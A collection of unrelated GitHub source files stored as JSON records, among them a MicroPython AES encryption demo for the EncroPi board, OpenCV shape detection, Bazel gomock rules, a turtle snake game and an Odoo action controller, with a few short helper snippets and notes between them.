+{"seq_id":"10276471653","text":"'''\r\n#------------------------------------------------------------------------\r\n#\r\n# This is a python Example code for EncroPi Board\r\n# Written by SB Components Ltd \r\n#\r\n#==================================================================================\r\n# Copyright (c) SB Components Ltd\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy \r\n# of this software and associated documentation files (the \"Software\"), to deal \r\n# in the Software without restriction, including without limitation the rights \r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell \r\n# copies of the Software, and to permit persons to whom the Software is \r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all \r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, \r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE \r\n# SOFTWARE.\r\n#==================================================================================\r\n'''\r\n\r\nfrom machine import Pin, SPI ,UART\r\nfrom ucryptolib import aes\r\nimport random\r\nimport time\r\nimport EncroPi\r\nimport uos\r\nimport os\r\nimport st7789\r\nimport vga1_bold_16x32 as font\r\n\r\nMODE_CBC = 2\r\nBLOCK_SIZE = 16\r\n\r\nsd=EncroPi.SDCard()\r\nspi = SPI(1, baudrate=40000000, sck=Pin(10), mosi=Pin(11))\r\ntft = st7789.ST7789(spi,135,240,reset=Pin(12, Pin.OUT),cs=Pin(9, Pin.OUT),dc=Pin(8, Pin.OUT),backlight=Pin(13, Pin.OUT),rotation=1)\r\n\r\ndef info():\r\n tft.init()\r\n time.sleep(0.2)\r\n tft.text(font,\"SB COMPONENTS\", 15,20)\r\n tft.fill_rect(15, 60, 210,10, st7789.RED)\r\n \r\n tft.text(font,\"EncroPi\", 15,80,st7789.YELLOW)\r\n #tft.text(font,\"CHECK\", 15,100,st7789.YELLOW)\r\n tft.fill_rect(15, 140, 210, 10, st7789.BLUE)\r\n time.sleep(2)\r\n tft.fill(0) #clear screen\r\n \r\ninfo()\r\n\r\nkey = b'this_is_the_key_123456_asdfgh123'\r\n\r\nplaintext = 'SB COMPONENTS'\r\n\r\nprint('Plain Text:', plaintext)\r\ntft.text(font,\"Plain Text:\", 15,20,st7789.YELLOW)\r\ntft.text(font,plaintext, 15,80,st7789.YELLOW)\r\ntime.sleep(2)\r\ntft.fill(0)\r\n# Padding plain text with space \r\npad = BLOCK_SIZE - len(plaintext) % BLOCK_SIZE\r\nplaintext = plaintext + \" \"*pad\r\n\r\niv = uos.urandom(BLOCK_SIZE)\r\ncipher = aes(key,MODE_CBC,iv)\r\n \r\nct_bytes = iv + cipher.encrypt(plaintext)\r\nprint ('AES-CBC encrypted:', ct_bytes)\r\ntft.text(font,'Encrypted:', 15,20,st7789.YELLOW)\r\ntft.text(font,ct_bytes, 15,80,st7789.YELLOW)\r\ntime.sleep(2)\r\ntft.fill(0)\r\n\r\n\r\nvfs = os.VfsFat(sd)\r\nos.mount(vfs, \"/fc\")\r\nprint(\"Filesystem check\")\r\nprint(os.listdir(\"/fc\"))\r\n\r\nfn = \"/fc/Encripted.bin\" # make encripted file\r\n\r\n\r\nprint()\r\nprint(\"Single block read/write\")\r\nwith open(fn, \"ab\") as f:\r\n n = f.write(ct_bytes)\r\n print(n, \"bytes written\") \r\n\r\nwith open(fn, \"rb\") as f:\r\n result2 = f.read()\r\n print(result2)\r\n print(len(result2), \"bytes read\")\r\n\r\nprint(result2)\r\niv = 
result2[:BLOCK_SIZE]\r\ncipher = aes(key,MODE_CBC,iv)\r\ndecrypted = cipher.decrypt(result2)[BLOCK_SIZE:]\r\nprint('AES-CBC decrypted:', decrypted)\r\ntft.text(font,'Decrypted', 15,20,st7789.YELLOW)\r\ntft.text(font,decrypted, 15,80,st7789.YELLOW)\r\ntime.sleep(2)\r\n#tft.fill(0)\r\nos.umount(\"/fc\")\r\n","repo_name":"sbcshop/EncroPi-Software","sub_path":"Encryption/encryption_sdcard.py","file_name":"encryption_sdcard.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
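The same round trip can be reproduced on desktop CPython for testing away from the board. This sketch assumes pycryptodome is installed and mirrors the space padding and iv-prefixed ciphertext layout used above:

from Crypto.Cipher import AES          # pip install pycryptodome
from Crypto.Random import get_random_bytes

BLOCK_SIZE = 16
key = b'this_is_the_key_123456_asdfgh123'   # 32 bytes -> AES-256, as above
plaintext = 'SB COMPONENTS'
# pad with spaces to a multiple of the block size, same as the firmware code
padded = plaintext + " " * (BLOCK_SIZE - len(plaintext) % BLOCK_SIZE)

iv = get_random_bytes(BLOCK_SIZE)
ct = iv + AES.new(key, AES.MODE_CBC, iv).encrypt(padded.encode())
pt = AES.new(key, AES.MODE_CBC, ct[:BLOCK_SIZE]).decrypt(ct[BLOCK_SIZE:])
assert pt.decode().rstrip() == plaintext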
+{"seq_id":"39916890194","text":"\"\"\"\nGhost's age\n\"\"\"\n\ndef fib(n):\n if n < 2:\n return n\n return fib(n-2) + fib(n-1)\n\ndef make_transperency_table(max_transperency, max_age):\n FIBONACCI = list(map(fib, range(0, 21)))\n previous_transperency = max_transperency\n transperency_table = {}\n for age in range(max_age):\n if age in FIBONACCI:\n transperency = previous_transperency - age\n else:\n transperency = previous_transperency + 1\n transperency_table[transperency] = age\n previous_transperency = transperency\n return transperency_table\n\nmax_age = 5000\nmax_transperency = 10000\ncurrent_transperency = 9998\ntransperency_table = make_transperency_table(max_transperency, max_age)\n\ntry:\n print(f'current age for {current_transperency} transperency is {transperency_table[current_transperency]}')\nexcept KeyError as e:\n print('Such value does not exist for transperency.')\n","repo_name":"gidmaster/python_courses","sub_path":"Lesson 08/Task_865.py","file_name":"Task_865.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3583918378","text":"from __future__ import unicode_literals\nfrom django.utils.six import python_2_unicode_compatible\n\nimport Choices\nfrom django.db import models\n\n\n# Create your models here.\n\n@python_2_unicode_compatible\nclass Exploit(models.Model):\n isVerified = models.BooleanField(default=False)\n type = models.IntegerField(choices=Choices.TYPE_CHOICES, default=1)\n platform = models.IntegerField(choices=Choices.PLATFORM_CHOICES, default=1)\n author = models.CharField(max_length=100)\n cve = models.CharField(max_length=30, default=\"N/A\")\n app_link = models.URLField()\n title = models.CharField(max_length=200,default=\"\")\n exploit = models.TextField()\n published = models.DateField()\n\n def __str__(self):\n return self.title\n","repo_name":"n1arash/SploitDB","sub_path":"exploit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31622200057","text":"import cv2\nimport numpy as np\nfrom skimage import exposure, img_as_float, img_as_ubyte\n\nclass recongize_circle():\n def __init__(self, garyimg):\n self.img = np.array(garyimg)\n self.circle = None\n self.type = self.img.dtype\n def train(self):\n # self.img = self.img / 256\n self.img = img_as_float(self.img)\n self.img = exposure.rescale_intensity(self.img)\n self.img = self.img * 256\n while exposure.is_low_contrast(self.img):\n self.img = exposure.adjust_gamma(self.img, 0.8)\n self.img = self.img.astype(np.uint8)\n self.img = img_as_ubyte(self.img)\n '''cv2 median filter-->>Reduce Noise'''\n '''Optional:cv2 gaussian filter-->>cv2.GaussianBlur'''\n self.img = cv2.medianBlur(self.img, 3)\n '''cv2 threshold-->>gain contrast'''\n '''Optional:cv2.adaptiveThreshold-->>have no good result'''\n ret, self.img = cv2.threshold(self.img, 50, 255, cv2.THRESH_BINARY)\n\n def search(self):\n '''\n Hough Circles recognize sample cell\n '''\n self.circles1 = cv2.HoughCircles(self.img, cv2.HOUGH_GRADIENT, 2, 100, param1=100, param2=25, minRadius=230,\n maxRadius=280)\n\n def output(self):\n '''\n Exception Handling\n hough circles NOT identify circles\n Exception:\n TypeError\n '''\n try:\n circles = self.circles1[0, :, :]\n except TypeError:\n pass\n print('no circles')\n else:\n circles = np.uint16(np.around(circles))\n temp = circles\n if np.shape(temp)[0] == 1:\n self.circle = temp[0]\n else:\n countarray = []\n for i in temp:\n sumarray = []\n x = i[0]\n y = i[1]\n r = i[2]\n for yi, xline in enumerate(self.img):\n for xi, value in enumerate(xline):\n left = ((x - xi) ** 2 + (y - yi) ** 2)\n right = r ** 2\n if left <= right:\n sumarray.append(value)\n sumarray = np.array(sumarray)\n sum = np.mean(sumarray)\n countarray.append(sum)\n countarray = np.array(countarray)\n index = np.where(countarray == np.min(countarray))\n self.circle = temp[index[0][0]]\n return self.circle\n\n def train_search_output(self):\n self.train(), self.search(), self.output()\n\n def draw_all(self,color_img):\n if np.array(color_img).dtype == 'float32':\n color_img = color_img*256\n if np.array(color_img).dtype == 'uint16':\n color_img = color_img/256\n color_img = color_img.astype(np.uint8)\n for circle in self.circles1[0, :, :]:\n cv2.circle(color_img, (circle[0], circle[1]), circle[2], (0, 255, 0), 5)\n cv2.circle(color_img, (circle[0], circle[1]), 150, (0, 0, 255), 5)\n cv2.circle(color_img, (circle[0], circle[1]), 6, (255, 0, 0), -1)\n return color_img\n\n def draw(self,color_img):\n if np.array(color_img).dtype == 'float32':\n color_img = color_img*256\n if np.array(color_img).dtype == 'uint16':\n color_img = color_img/256\n color_img = color_img.astype(np.uint8)\n cv2.circle(color_img, (self.circle[0], self.circle[1]), self.circle[2], (0, 255, 0), 5)\n cv2.circle(color_img, (self.circle[0], self.circle[1]), 150, (0, 0, 255), 5)\n cv2.circle(color_img, (self.circle[0], self.circle[1]), 6, (255, 0, 0), -1)\n return color_img\n\nclass recongize_linesP():\n def __init__(self, cannyimg):\n self.img = np.array(cannyimg)\n self.line = None\n self.type = self.img.dtype\n\n def train(self):\n # self.img = self.img / 256\n self.img = img_as_float(self.img)\n self.img = exposure.rescale_intensity(self.img)\n self.img = self.img * 256\n while exposure.is_low_contrast(self.img):\n self.img = exposure.adjust_gamma(self.img, 0.8)\n self.img = self.img.astype(np.uint8)\n # self.img = img_as_ubyte(self.img)\n '''cv2 median filter-->>Reduce Noise'''\n '''Optional:cv2 gaussian 
filter-->>cv2.GaussianBlur'''\n # self.img = cv2.medianBlur(self.img, 3)\n self.img = cv2.GaussianBlur(self.img, (5, 5), 0)\n # self.img = cv2.fastNlMeansDenoising(self.img,h=3,templateWindowSize=7,searchWindowSize=21)\n '''cv2 threshold-->>gain contrast'''\n '''Optional:cv2.adaptiveThreshold-->>have no good result'''\n ret, self.img = cv2.threshold(self.img, 40, 255, cv2.THRESH_BINARY)\n '''cv2 canny-->>find high contrast area'''\n self.img = cv2.Canny(self.img, 90, 25)\n\n def search(self):\n '''cv2 HoughLinesP-->>find lines'''\n self.lines1 = cv2.HoughLinesP(self.img, 1, np.pi / 360, 50, minLineLength=100, maxLineGap=30)\n\n def Linear_X(self, y, b, k):\n x = (y - b) / k\n return int(x)\n\n def output(self, top_point=175, bot_point=675, L_offset=-135, R_offset=-35):\n rectangle_point = []\n try:\n len(self.lines1)\n except TypeError:\n print('no lines')\n else:\n for i in self.lines1:\n for x1, y1, x2, y2 in i:\n if abs((y1 - y2) / (x1 - x2 + 1E-04)) > 7:\n K = (y1 - y2) / (x1 - x2 + 1E-04)\n if K < 0:\n B = (x2 * y1 - y2 * x1) / (x2 - x1 + 1E-04)\n X = self.Linear_X(0, B, K)\n\n rectangle_point.append([B, K, x1, x2, y1, y2, X])\n rectangle_point = np.array(rectangle_point)\n try:\n rectangle_point_index = np.where(rectangle_point == np.min(rectangle_point[:, 6]))\n except IndexError:\n rectangle_point = [10000, -40]\n else:\n rectangle_point = rectangle_point[rectangle_point_index[0][0]]\n self._B = int(rectangle_point[0])\n self._K = int(rectangle_point[1])\n self.xmin = (self.Linear_X(bot_point, self._B, K)) + L_offset\n self.ymin = bot_point\n self.xmax = (self.Linear_X(top_point, self._B, K)) + R_offset\n self.ymax = top_point\n return self.xmin, self.ymin, self.xmax, self.ymax\n\n def draw(self, color_img, color_array=(255, 255, 0), line_weight=5, top_point=175, bot_point=675, L_offset=-135,\n R_offset=-35):\n if np.array(color_img).dtype == 'float32':\n color_img = color_img*256\n if np.array(color_img).dtype == 'uint16':\n color_img = color_img/256\n color_img = color_img.astype(np.uint8)\n for i in self.lines1:\n for x1, y1, x2, y2 in i:\n if abs((y1 - y2) / (x1 - x2 + 1E-04)) > 7:\n cv2.line(color_img, (x1, y1), (x2, y2), (0, 255, 255), 5)\n '''draw parallelogram'''\n cv2.line(color_img,\n ((self.Linear_X(top_point, self._B, self._K) + L_offset), top_point),\n ((self.Linear_X(bot_point, self._B, self._K) + L_offset), bot_point),\n color_array, line_weight)\n cv2.line(color_img,\n ((self.Linear_X(top_point, self._B, self._K) + R_offset), top_point),\n ((self.Linear_X(bot_point, self._B, self._K) + R_offset), bot_point),\n color_array, line_weight)\n cv2.line(color_img,\n ((self.Linear_X(top_point, self._B, self._K) + L_offset), top_point),\n ((self.Linear_X(top_point, self._B, self._K) + R_offset), top_point),\n color_array, line_weight)\n cv2.line(color_img,\n ((self.Linear_X(bot_point, self._B, self._K) + L_offset), bot_point),\n ((self.Linear_X(bot_point, self._B, self._K) + R_offset), bot_point),\n color_array, line_weight)\n return color_img\n\n def train_search_output(self):\n self.train(), self.search(), self.output()\n","repo_name":"VHsCHs/PyHyperspectral","sub_path":"models/cv_circles_linesP.py","file_name":"cv_circles_linesP.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
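A smoke test for the circle path: a synthetic frame with one disk whose radius falls inside the hard-coded minRadius/maxRadius window, fed straight to the same HoughCircles parameters used in search(). Detection quality on real frames depends on the threshold constants, so treat this as a sanity check only:

import cv2
import numpy as np

img = np.full((800, 800), 255, dtype=np.uint8)   # bright background
cv2.circle(img, (400, 400), 250, 0, -1)          # one dark disk, radius 250
img = cv2.medianBlur(img, 3)
circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 2, 100,
                           param1=100, param2=25, minRadius=230, maxRadius=280)
if circles is not None:
    print(np.uint16(np.around(circles[0])))      # expect roughly [[400 400 250]]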
+{"seq_id":"6297894548","text":"load(\"@io_bazel_rules_go//go:def.bzl\", \"go_binary\", \"go_context\", \"go_rule\")\nload(\"@io_bazel_rules_go//go/private:providers.bzl\", \"GoLibrary\")\n\n_MOCKGEN_TOOL = \"@com_github_golang_mock//mockgen\"\n_MOCKGEN_MODEL_LIB = \"@com_github_golang_mock//mockgen/model:go_default_library\"\n\ndef _gomock_source_impl(ctx):\n args = [\"-source\", ctx.file.source.path]\n if ctx.attr.package != \"\":\n args += [\"-package\", ctx.attr.package]\n args += [\",\".join(ctx.attr.interfaces)]\n\n out = ctx.outputs.out\n cmd = ctx.file.mockgen_tool\n go_ctx = go_context(ctx)\n inputs = go_ctx.sdk.headers + go_ctx.sdk.srcs + go_ctx.sdk.tools + [ctx.file.source]\n\n # We can use the go binary from the stdlib for most of the environment\n # variables, but our GOPATH is specific to the library target we were given.\n ctx.actions.run_shell(\n outputs = [out],\n inputs = inputs,\n tools = [\n cmd,\n go_ctx.go,\n ],\n command = \"\"\"\n source <($PWD/{godir}/go env) &&\n export PATH=$GOROOT/bin:$PWD/{godir}:$PATH &&\n {cmd} {args} > {out}\n \"\"\".format(\n godir = go_ctx.go.path[:-1 - len(go_ctx.go.basename)],\n cmd = \"$(pwd)/\" + cmd.path,\n args = \" \".join(args),\n out = out.path,\n ),\n )\n\n_gomock_source = go_rule(\n _gomock_source_impl,\n attrs = {\n \"library\": attr.label(\n doc = \"The target the Go library is at to look for the interfaces in. When this is set and source is not set, mockgen will use its reflect code to generate the mocks. If source is set, its dependencies will be included in the GOPATH that mockgen will be run in.\",\n providers = [GoLibrary],\n mandatory = True,\n ),\n \"source\": attr.label(\n doc = \"A Go source file to find all the interfaces to generate mocks for. See also the docs for library.\",\n mandatory = False,\n allow_single_file = True,\n ),\n \"out\": attr.output(\n doc = \"The new Go file to emit the generated mocks into\",\n mandatory = True,\n ),\n \"interfaces\": attr.string_list(\n allow_empty = False,\n doc = \"The names of the Go interfaces to generate mocks for. If not set, all of the interfaces in the library or source file will have mocks generated for them.\",\n mandatory = True,\n ),\n \"package\": attr.string(\n doc = \"The name of the package the generated mocks should be in. If not specified, uses mockgen's default.\",\n ),\n \"self_package\": attr.string(\n doc = \"The full package import path for the generated code. The purpose of this flag is to prevent import cycles in the generated code by trying to include its own package. This can happen if the mock's package is set to one of its inputs (usually the main one) and the output is stdio so mockgen cannot detect the final output package. 
Setting this flag will then tell mockgen which import to exclude.\",\n ),\n \"mockgen_tool\": attr.label(\n doc = \"The mockgen tool to run\",\n default = Label(_MOCKGEN_TOOL),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = False,\n ),\n },\n)\n\ndef gomock(name, library, out, **kwargs):\n mockgen_tool = _MOCKGEN_TOOL\n if kwargs.get(\"mockgen_tool\", None):\n mockgen_tool = kwargs[\"mockgen_tool\"]\n\n if kwargs.get(\"source\", None):\n _gomock_source(\n name = name,\n library = library,\n out = out,\n **kwargs\n )\n else:\n _gomock_reflect(\n name = name,\n library = library,\n out = out,\n mockgen_tool = mockgen_tool,\n **kwargs\n )\n\ndef _gomock_reflect(name, library, out, mockgen_tool, **kwargs):\n interfaces = kwargs.get(\"interfaces\", None)\n mockgen_model_lib = _MOCKGEN_MODEL_LIB\n if kwargs.get(\"mockgen_model_library\", None):\n mockgen_model_lib = kwargs[\"mockgen_model_library\"]\n\n prog_src = name + \"_gomock_prog\"\n prog_src_out = prog_src + \".go\"\n _gomock_prog_gen(\n name = prog_src,\n interfaces = interfaces,\n library = library,\n package = kwargs.get(\"package\", None),\n out = prog_src_out,\n mockgen_tool = mockgen_tool,\n )\n prog_bin = name + \"_gomock_prog_bin\"\n go_binary(\n name = prog_bin,\n srcs = [prog_src_out],\n deps = [library, mockgen_model_lib],\n )\n _gomock_prog_exec(\n name = name,\n interfaces = interfaces,\n library = library,\n package = kwargs.get(\"package\", None),\n out = out,\n prog_bin = prog_bin,\n mockgen_tool = mockgen_tool,\n self_package = kwargs.get(\"self_package\", None),\n )\n\ndef _gomock_prog_gen_impl(ctx):\n args = [\"-prog_only\"]\n if ctx.attr.package != \"\":\n args += [\"-package\", ctx.attr.package]\n args += [ctx.attr.library[GoLibrary].importpath]\n args += [\",\".join(ctx.attr.interfaces)]\n\n cmd = ctx.file.mockgen_tool\n out = ctx.outputs.out\n ctx.actions.run_shell(\n outputs = [out],\n tools = [cmd],\n command = \"\"\"\n {cmd} {args} > {out}\n \"\"\".format(\n cmd = \"$(pwd)/\" + cmd.path,\n args = \" \".join(args),\n out = out.path,\n ),\n )\n\n_gomock_prog_gen = go_rule(\n _gomock_prog_gen_impl,\n attrs = {\n \"library\": attr.label(\n doc = \"The target the Go library is at to look for the interfaces in. When this is set and source is not set, mockgen will use its reflect code to generate the mocks.\",\n providers = [GoLibrary],\n mandatory = True,\n ),\n \"out\": attr.output(\n doc = \"The new Go source file put the mock generator code\",\n mandatory = True,\n ),\n \"interfaces\": attr.string_list(\n allow_empty = False,\n doc = \"The names of the Go interfaces to generate mocks for. If not set, all of the interfaces in the library or source file will have mocks generated for them.\",\n mandatory = True,\n ),\n \"package\": attr.string(\n doc = \"The name of the package the generated mocks should be in. 
If not specified, uses mockgen's default.\",\n ),\n \"mockgen_tool\": attr.label(\n doc = \"The mockgen tool to run\",\n default = Label(_MOCKGEN_TOOL),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = False,\n ),\n },\n)\n\ndef _gomock_prog_exec_impl(ctx):\n args = [\"-exec_only\", ctx.file.prog_bin.path]\n if ctx.attr.package != \"\":\n args += [\"-package\", ctx.attr.package]\n\n if ctx.attr.self_package != \"\":\n args += [\"-self_package\", ctx.attr.self_package]\n\n args += [ctx.attr.library[GoLibrary].importpath]\n args += [\",\".join(ctx.attr.interfaces)]\n\n ctx.actions.run_shell(\n outputs = [ctx.outputs.out],\n inputs = [ctx.file.prog_bin],\n tools = [ctx.file.mockgen_tool],\n command = \"\"\"{cmd} {args} > {out}\"\"\".format(\n cmd = \"$(pwd)/\" + ctx.file.mockgen_tool.path,\n args = \" \".join(args),\n out = ctx.outputs.out.path,\n ),\n env = {\n # GOCACHE is required starting in Go 1.12\n \"GOCACHE\": \"./.gocache\",\n },\n )\n\n_gomock_prog_exec = go_rule(\n _gomock_prog_exec_impl,\n attrs = {\n \"library\": attr.label(\n doc = \"The target the Go library is at to look for the interfaces in. When this is set and source is not set, mockgen will use its reflect code to generate the mocks. If source is set, its dependencies will be included in the GOPATH that mockgen will be run in.\",\n providers = [GoLibrary],\n mandatory = True,\n ),\n \"out\": attr.output(\n doc = \"The new Go source file to put the generated mock code\",\n mandatory = True,\n ),\n \"interfaces\": attr.string_list(\n allow_empty = False,\n doc = \"The names of the Go interfaces to generate mocks for. If not set, all of the interfaces in the library or source file will have mocks generated for them.\",\n mandatory = True,\n ),\n \"package\": attr.string(\n doc = \"The name of the package the generated mocks should be in. If not specified, uses mockgen's default.\",\n ),\n \"self_package\": attr.string(\n doc = \"The full package import path for the generated code. The purpose of this flag is to prevent import cycles in the generated code by trying to include its own package. This can happen if the mock's package is set to one of its inputs (usually the main one) and the output is stdio so mockgen cannot detect the final output package. Setting this flag will then tell mockgen which import to exclude.\",\n ),\n \"prog_bin\": attr.label(\n doc = \"The program binary generated by mockgen's -prog_only and compiled by bazel.\",\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = True,\n ),\n \"mockgen_tool\": attr.label(\n doc = \"The mockgen tool to run\",\n default = Label(_MOCKGEN_TOOL),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = False,\n ),\n },\n)\n","repo_name":"micnncim/protocol-buffers-language-server","sub_path":"build/bazel/gomock.bzl","file_name":"gomock.bzl","file_ext":"bzl","file_size_in_byte":9532,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"71"}
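A hypothetical BUILD-file invocation of the gomock macro above; the target, library label, and interface names are invented for illustration:

load("//build/bazel:gomock.bzl", "gomock")

gomock(
    name = "store_mocks",
    library = "//pkg/store:go_default_library",
    out = "store_mocks.go",
    interfaces = ["Store", "Txn"],
    package = "mocks",
)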
+{"seq_id":"39899814351","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('/', views.results_by_order, name='results_by_order'),\n path('viewdb', views.dbOrder.as_view(), name='probando'),\n path('all_categories', views.Stadistics.as_view(), name='products_by_category'),\n path('all_payments', views.Payments.as_view(), name='types_payments'),\n]","repo_name":"tiarasilva/toteat-tiara","sub_path":"backend/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71339339430","text":"import turtle\nimport random\nimport time\n\n# Set up the screen\nscreen = turtle.Screen()\nscreen.title(\"Snake Game\")\nscreen.setup(width=800, height=800)\nscreen.bgcolor(\"green\")\nscreen.tracer(0)\n\n# Create border\nborder_pen = turtle.Turtle()\nborder_pen.speed(0)\nborder_pen.color(\"orange\")\nborder_pen.pensize(4)\nborder_pen.penup()\nborder_pen.goto(-310, 250)\nborder_pen.pendown()\nfor _ in range(2):\n border_pen.forward(620)\n border_pen.right(90)\n border_pen.forward(500)\n border_pen.right(90)\nborder_pen.hideturtle()\n\n# Score\nscore = 0\n\n# Snake\nsnake = turtle.Turtle()\nsnake.speed(0)\nsnake.shape(\"square\")\nsnake.color(\"red\") \nsnake.penup()\nsnake.goto(0, 0)\nsnake.direction = \"stop\"\n\n# Food\nfruit = turtle.Turtle()\nfruit.speed(0)\nfruit.shape(\"square\")\nfruit.color(\"white\")\nfruit.penup()\nfruit.goto(30, 30)\n\n# Scoring\nscoring = turtle.Turtle()\nscoring.speed(0)\nscoring.color(\"white\")\nscoring.penup()\nscoring.hideturtle()\nscoring.goto(0, 350)\nscoring.write(\"Score: \", align=\"center\", font=(\"Courier\", 24, \"bold\"))\n\n# Functions for movement\ndef snake_go_up():\n if snake.direction != \"down\":\n snake.direction = \"up\"\n\ndef snake_go_down():\n if snake.direction != \"up\":\n snake.direction = \"down\"\n\ndef snake_go_left():\n if snake.direction != \"right\":\n snake.direction = \"left\"\n\ndef snake_go_right():\n if snake.direction != \"left\":\n snake.direction = \"right\"\n\ndef snake_move():\n if snake.direction == \"up\":\n y = snake.ycor()\n snake.sety(y + 20)\n elif snake.direction == \"down\":\n y = snake.ycor()\n snake.sety(y - 20)\n elif snake.direction == \"left\":\n x = snake.xcor()\n snake.setx(x - 20)\n elif snake.direction == \"right\":\n x = snake.xcor()\n snake.setx(x + 20)\n\n# Keyboard bindings\nscreen.listen()\nscreen.onkeypress(snake_go_up, \"Up\")\nscreen.onkeypress(snake_go_down, \"Down\")\nscreen.onkeypress(snake_go_left, \"Left\")\nscreen.onkeypress(snake_go_right, \"Right\")\n\n# Main game loop\ndelay = 0.1\nold_fruit = []\n\nwhile True:\n screen.update()\n\n # Check for collision with food\n if snake.distance(fruit) < 20:\n x = random.randint(-290, 270)\n y = random.randint(-240, 240)\n fruit.goto(x, y)\n\n # Update score\n score += 1\n scoring.clear()\n scoring.write(\"Score: {}\".format(score), align=\"center\", font=(\"Courier\", 24, \"bold\"))\n\n # Add a new piece to the snake\n new_fruit = turtle.Turtle()\n new_fruit.speed(0)\n new_fruit.shape(\"square\")\n new_fruit.color(\"red\")\n new_fruit.penup()\n old_fruit.append(new_fruit)\n\n # Move the end pieces first in reverse order\n for index in range(len(old_fruit) - 1, 0, -1):\n x = old_fruit[index - 1].xcor()\n y = old_fruit[index - 1].ycor()\n old_fruit[index].goto(x, y)\n\n # Move the first piece to where the snake's head is\n if len(old_fruit) > 0:\n x = snake.xcor()\n y = snake.ycor()\n old_fruit[0].goto(x, y)\n\n # Move the snake\n snake_move()\n\n # Check for collisions with border\n if (\n snake.xcor() > 280\n or snake.xcor() < -300\n or snake.ycor() > 240\n or snake.ycor() < -240\n ):\n time.sleep(1)\n snake.goto(0, 0)\n snake.direction = \"stop\"\n\n # Reset score and hide old fruit pieces\n score = 0\n scoring.clear()\n for piece in old_fruit:\n piece.goto(1000, 1000)\n old_fruit.clear()\n\n # Check for collisions with snake's body\n for piece in old_fruit:\n if piece.distance(snake) < 20:\n time.sleep(1)\n snake.goto(0, 0)\n snake.direction = \"stop\"\n\n # Reset score and hide old fruit pieces\n score = 0\n 
scoring.clear()\n for piece in old_fruit:\n piece.goto(1000, 1000)\n old_fruit.clear()\n\n # Pause before the next frame\n time.sleep(delay)\n\nturtle.done()\n","repo_name":"Jkhattak/SnakeGameInPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
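A note on the two reset branches in the snake entry above: the body-collision branch duplicates the border-reset code and calls old_fruit.clear() inside the loop that iterates old_fruit, which ends the scan early (harmless only because the game resets anyway). A minimal sketch of a shared helper; reset_game is a name introduced here, not part of the original:

def reset_game(snake, scoring, old_fruit, font=("Courier", 24, "bold")):
    # Recenter and stop the head, park the body segments off-screen,
    # and return the reset score.
    snake.goto(0, 0)
    snake.direction = "stop"
    scoring.clear()
    scoring.write("Score: 0", align="center", font=font)
    for piece in list(old_fruit):  # copy: never mutate a list mid-iteration
        piece.goto(1000, 1000)
    old_fruit.clear()
    return 0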
+{"seq_id":"33936355855","text":"import logging\nfrom odoo import _\nfrom odoo.exceptions import MissingError\nfrom odoo.http import Controller, request, route\nfrom .utils import clean_action\n\n\n_logger = logging.getLogger(__name__)\n\n\nclass Action(Controller):\n\n @route('/web/action/load', type='json', auth=\"user\")\n def load(self, action_id, additional_context=None):\n Actions = request.env['ir.actions.actions']\n value = False\n try:\n action_id = int(action_id)\n except ValueError:\n try:\n action = request.env.ref(action_id)\n assert action._name.startswith('ir.actions.')\n action_id = action.id\n except Exception as exc:\n raise MissingError(_(\"The action %r does not exist.\", action_id)) from exc\n\n base_action = Actions.browse([action_id]).sudo().read(['type'])\n if base_action:\n action_type = base_action[0]['type']\n if action_type == 'ir.actions.report':\n request.update_context(bin_size=True)\n if additional_context:\n request.update_context(**additional_context)\n action = request.env[action_type].sudo().browse([action_id]).read()\n if action:\n value = clean_action(action[0], env=request.env)\n return value\n\n @route('/web/action/run', type='json', auth=\"user\")\n def run(self, action_id, context=None):\n if context:\n request.update_context(**context)\n action = request.env['ir.actions.server'].browse([action_id])\n result = action.run()\n return clean_action(result, env=action.env) if result else False\n","repo_name":"odoo/odoo","sub_path":"addons/web/controllers/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
